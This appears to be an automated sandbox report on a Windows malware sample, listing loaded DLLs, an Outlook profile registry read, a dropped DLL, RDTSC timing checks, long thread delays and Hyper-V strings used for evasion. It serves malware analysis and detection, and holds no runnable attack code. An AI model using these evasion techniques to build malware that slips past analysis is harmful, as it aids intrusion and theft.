            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: b5BQbAhwVD.exeStatic file information: File size 1050481 > 1048576
            Source: b5BQbAhwVD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2385539475.0000000003DC5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_72ED1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_72ED1B5F
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_3387242B push dword ptr [edi+eax*2-75h]; iretd 3_2_338723BD
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeFile created: C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeAPI/Special instruction interceptor: Address: 467A46C
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeAPI/Special instruction interceptor: Address: 2B1A46C
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeRDTSC instruction interceptor: First address: 463D053 second address: 463D053 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F8D6CB1F6AAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeRDTSC instruction interceptor: First address: 2ADD053 second address: 2ADD053 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F8D6CC229AAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeMemory allocated: 33890000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeMemory allocated: 33530000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599641Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599516Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599406Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599187Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598640Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597546Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596780Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596042Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595930Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595484Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595375Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595265Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594938Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594688Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594563Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594453Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594344Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594219Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeWindow / User API: threadDelayed 7925Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeWindow / User API: threadDelayed 1915Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss456A.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeAPI coverage: 3.6 %
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -30437127721620741s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2760Thread sleep count: 7925 > 30Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2760Thread sleep count: 1915 > 30Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -599641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -599516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -599406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -599297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -599187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -599078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -598969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -598859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -598750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -598640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -598531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -598422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -598312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -598203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -598094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -597984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -597875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -597765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -597656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -597546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -597437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -597328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -597219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -597109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -597000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -596890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -596780s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -596672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -596562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -596453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -596344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -596042s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -595930s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -595813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -595703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -595594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -595484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -595375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -595265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -595156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -595047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -594938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -594813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -594688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -594563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -594453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -594344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exe TID: 2752Thread sleep time: -594219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeCode function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599641Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599516Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599406Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599187Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598640Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597546Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596780Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 596042Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595930Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595484Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595375Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595265Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594938Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594688Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594563Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594453Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594344Jump to behavior
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeThread delayed: delay time: 594219Jump to behavior
            Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0X#
            Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~
            Source: C:\Users\user\Desktop\b5BQbAhwVD.exeAPI call chain: ExitProcess graph end nodegraph_0-4590
